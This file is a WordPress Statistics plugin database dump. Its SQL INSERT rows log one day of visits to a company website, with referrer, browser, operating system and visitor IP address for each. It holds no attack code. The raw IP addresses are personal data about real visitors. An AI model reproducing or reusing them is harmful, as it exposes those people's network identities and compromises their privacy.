INSERT INTO `wp_statistics_visitor` VALUES (8479, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.183.158.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8480, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.153.44.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8481, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.48.83.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8482, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.74.216.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8483, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '143.255.255.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8484, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.46.183.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8485, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiC-OnaoerPAhVJylQKHeK-DiUQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '199.46.251.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8486, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '223.196.25.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8487, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwij05bnoerPAhUnslQKHW-oDEoQFgguMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fquik-freeze-ms-242n%2F&usg=AFQjCNFVmCGtC1tqzs6rUvFoPwc9KLYe5w&bvm=bv.136499718,d.cGw', 'MSIE', 'Windows', '11.0', '', '38.96.42.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8488, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.133.237.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8489, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.103.81.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8490, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.216.45.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8491, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.221.0.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8492, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.115.69.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8493, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '212.179.42.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8494, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.207.154.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8495, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.46.210.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8496, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.186.52.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8497, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '106.69.161.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8498, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '69.127.26.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8499, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.48.131.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8500, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.153.162.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8501, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.179.98.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8502, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.3', '', '171.64.85.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8503, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '148.0.85.153', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8504, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.152.186.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8505, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.255.111.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8506, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.156.147.248', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8507, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.105.51.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8508, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.157.224.69', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8509, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.14.196.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8510, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.83.48.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8511, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '51.36.236.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8512, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.249.70.227', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8513, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.226.141.54', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8514, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.200.199.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8515, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.52.94.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8516, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.21.43.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8517, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.12.236.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8518, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '68.231.113.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8519, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.135.193.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8520, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '45.20.234.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8521, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.241.170.187', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8522, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.174.43.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8523, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '172.20.1.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8524, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.196.80.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8525, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.213.44.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8526, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '97.97.170.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8527, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '65.94.41.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8528, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.110.156.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8529, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.108.146.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8530, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.247.255.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8531, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.32.64.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8532, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '163.172.209.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8533, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.255.216.236', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8534, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '120.29.66.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8535, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.116.67.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8536, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.50.81.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8537, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '106.51.21.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8538, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.199.204.196', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8539, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.47.133.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8540, '2016-10-20', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.99', '', '192.126.158.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8541, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '69.160.120.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8542, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.171.173.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8543, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '47.29.102.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8544, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.116.29.106', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8545, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '96.95.152.245', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8546, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.210.229.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8547, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.202.49.208', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8548, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '51.0.2704.81', '', '173.46.77.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8549, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.65.199.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8550, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.29.173.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8551, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.40.64.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8552, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '194.228.20.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8553, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.58.186.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8554, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.106.7.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8555, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.87.123.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8556, '2016-10-20', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '70.199.129.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8557, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.166.231.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8558, '2016-10-20', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '8.0', '', '62.24.196.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8559, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.223.165.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8560, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.11.226.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8561, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '70.52.85.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8562, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.140.145.208', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8563, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.253.204.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8564, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.209.76.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8565, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.246.3.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8566, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8567, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '107.143.28.215', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8568, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.104.210.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8569, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.32.52.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8570, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8571, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.71.142.93', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8572, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.26.167.51', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8573, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.69.166.155', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8574, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.113.54.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8575, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.139.132.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8576, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.33.229.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8577, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.70.157.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8578, '2016-10-20', 'https://r.search.yahoo.com/_ylt=A0LEVxBxNwlYLV4AGo5x.9w4;_ylu=X3oDMTE0azZwaWVkBGNvbG8DYmYxBHBvcwM0BHZ0aWQDVUkyRkJUMl8xBHNlYwNzcg--/RV=2/RE=1477027825/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2ffluoroextreme-dental-lubricants%2f/RK=0/RS=vRyJUZy9.GQ5jU.deJdrzIFQeY8-', 'Safari', 'iPhone', '10.0', '', '75.133.124.181', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8579, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.107.82.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8580, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.255.4.49', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8581, '2016-10-20', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.99', '', '107.183.37.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8582, '2016-10-20', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '107.183.37.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8583, '2016-10-20', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '107.183.37.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8584, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.152.70.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8585, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '101.185.64.64', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8586, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.108.82.69', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8587, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.48.110.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8588, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.161.167.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8589, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '50.252.9.241', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8590, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.134.201.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8591, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.239.226.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8592, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '99.13.92.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8593, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.5.98.49', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8594, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.182.95.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8595, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.228.166.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8596, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '191.102.72.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8597, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.155.27.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8598, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.195.65.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8599, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.24.175.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8600, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '167.0.232.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8601, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.34.73.215', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8602, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.120.211.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8603, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.66.5.40', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8604, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.248.197.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8605, '2016-10-20', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '71.57.154.63', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8606, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.158.7.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8607, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.185.112.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8608, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '106.174.121.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8609, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '47.19.9.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8610, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '138.59.27.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8611, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.154.255.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8612, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.106.79.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8613, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '134.19.218.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8614, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.140.91.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8615, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.45.236.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8616, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.2.147.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8617, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.88.19.176', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8618, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.96.105.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8619, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.180.13.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8620, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.215.147.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8621, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '101.182.144.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8622, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.177.112.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8623, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.67.177.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8624, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.73.148.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8625, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.85.189.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8626, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.31.242.194', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8627, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.49.55.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8628, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.136.201.43', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8629, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.68.105.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8630, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.133.20.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8631, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '209.95.50.127', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8632, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '107.15.171.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8633, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.34.159.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8634, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.197.192.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8635, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.206.76.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8636, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.162.47.248', '000', 3, 0); 
